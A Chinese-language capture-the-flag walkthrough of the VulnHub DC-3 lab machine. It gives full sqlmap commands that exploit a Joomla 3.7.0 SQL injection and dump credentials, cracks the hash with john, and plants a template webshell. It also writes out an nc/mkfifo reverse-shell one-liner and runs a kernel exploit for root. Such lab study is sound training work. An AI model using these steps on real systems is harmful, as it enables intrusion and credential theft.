vulnhub靶机渗透测式DC-3靶机渗透

kali的ip：192.168.56.102

dc-3的ip：192.168.56.104

网络配置：dc-3用的是仅主机模式；kali用的是桥接网络。

首先我们先用ifconfig查看自己的ip地址得到192.168.56.102；接着使用arp-scan -l 扫描出同网段下其它主机。

然后利用nmap进行扫描靶机ip

nmap -sV 192.168.56.104

可以发现开放了80端口，浏览器进行访问。

访问页面之后可以看到这次只有一个flag，一个入口且没有线索，在wappalyzer插件中可以看到cms是joomla，操作系统为ubuntu，web服务为apache。重点在于cms是joomla，dc-2中cms为wordpress，用wpscan工具进行扫描，同样，joomla也有专属于它的扫描器joomscan，kali中默认是有的，如果是第一次用就需要下载，直接使用下载命令

apt-get install joomscan

下载好之后就可以直接使用joomscan对网页url进行扫描了

joomscan --url http://192.168.56.104/

 在扫描结果中可以看到joomla版本为3.7.0，且发现可网站后台，用浏览器继续进行访问。

发现是个登录框。接着利用发现的joomla 3.7.0版本，进行查找漏洞

searchsploit joomla 3.7.0

发现 存在sql注入漏洞，且漏洞文本的路径也给了我们，接下来就是要利用这个漏洞，而我们所有漏洞利用数据库都在 /usr/share/exploitdb/exploits/目录下，我们可以来确定一下是不是

可以发现有很多个txt文件，而我们所要利用的就是42033.txt。打开此文件查看内容

vi /usr/share/exploitdb/exploits/php/webapps/42033.txt

在这个内容中我们直接发现了注入点，直接使用sqlmap列出数据库名

sqlmap -u "http://192.168.56.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 

flag大概率会在joomladb数据库中，接着我们列出joomladb的所有表名

sqlmap -u "http://192.168.56.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

发现users表，接着列出这个表中的字段

sqlmap -u "http://192.168.56.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#_users" --columns -p list[fullordering]

爆字段的时候有个坑，表名" #_users "  别自己输入，复制前面得到的，自己输入进去貌似做不到和上面显示出来的一样，我一开始就是自己输入表名的，然后就一直爆不出内容，然后复制前面得到的表名粘贴上去才成功。

接着列出账号密码

sqlmap -u "http://192.168.56.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C username,password --dump -p list[fullordering]

发现密码是加密过的，这里可以使用john工具对密文进行破解，这里给一个john工具的介绍以及使用方法的链接，个人觉得不错：(24条消息) John介绍及常用命令使用说明_Blue_Starry_sky的博客-CSDN博客_john用法

我们先将加密内容写进joomla.txt中

接着使用命令

john joomla.txt

破解成功

 可以看到密码为snoopy。进入登录后台进行登录

登录之后在extensions目录下有个beez3模板

 点进去之后看到有个new file新建个文件，可以考虑上传一个木马，我这里在html目录建的一个aaa.php文件，写入一句话木马

 保存了之后，蚁剑连接是需要路径的，我们要找到文件所储路径，其实就是刚刚我们一值点进来的，/templates/beez3/html/aaa.php 尝试进行访问，看看有没有成功新建成一个文件

执行成功，使用蚁剑进行连接，

连接成功，蚁剑打开虚拟终端

接着使用nc命令反弹一个shell，kali机中监听3333端口

nc -lvvp 3333

然后在蚁剑终端输入

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 3333 >/tmp/f

 此时看到kali机中反弹成功

接下来我们就是要进行提权操作

查看系统信息

uname -a
lsb_release -a

 此时发现操作系统Ubuntu的发行版本是16.04，我们可以利用该版本存在的漏洞进行提权。我们可以在漏洞利用数据库（exploit-db.com）中搜索Ubuntu 16.04找到提升权限的一个

 也可以在终端中使用searchsploit工具进行查找可利用的漏洞

我的kali有点问题，信息显示不完全。影响不大，我们直接看到和我们刚刚在网页中看到的一模一样的那一个，将这个文件内容拷贝到另一个txt文件中进行查看

在内容底部可以看到漏洞利用代码exp压缩包下载地址

由于github是国外服务器，在kali中进行下载多数都是失败的，我们可以在本机中下载好再拖进kali

 因为我们是要把这个压缩包上传到靶机里的，我们可以通过之前蚁剑连接好的数据包，然后把这个压缩包文件直接拖进去即可

此时我们在蚁剑终端就可以发现压缩包文件了

说明已经把该exp压缩包上传到靶机里了，然后开始解压

解压成功，接着我们发现有个39772文件，进入到该目录，发现有个exploit.tar

还是个压缩包，对其进行解压

tar -xvf exploit.tar

 

 解压完成之后就是如何对这个进行利用了，再查看有什么东西，发现有个ebpf_mapfd_doubleput_exploit目录，进入该目录

看到一个和之前在39772.txt文件中的使用方法中类似的东西

 

我们要使攻击机与靶机取得联系，就是说要从kali进入到靶机的那个目录下，并提权。所以我们在kali端中进入到exp压缩包所处的靶机目录中

 感觉看得不太方便，不知道当前所处在哪个目录，我们可以使用python反编译获得一个交互式的shell

我们是要获得权限，所以就调用之前提到的那个文件

./compile.sh

 成功执行，继续

./doubleput

 提示说我们有了root权限，接下来就是最后一步，回到root目录下找到flag

至此，dc-3靶机结束~~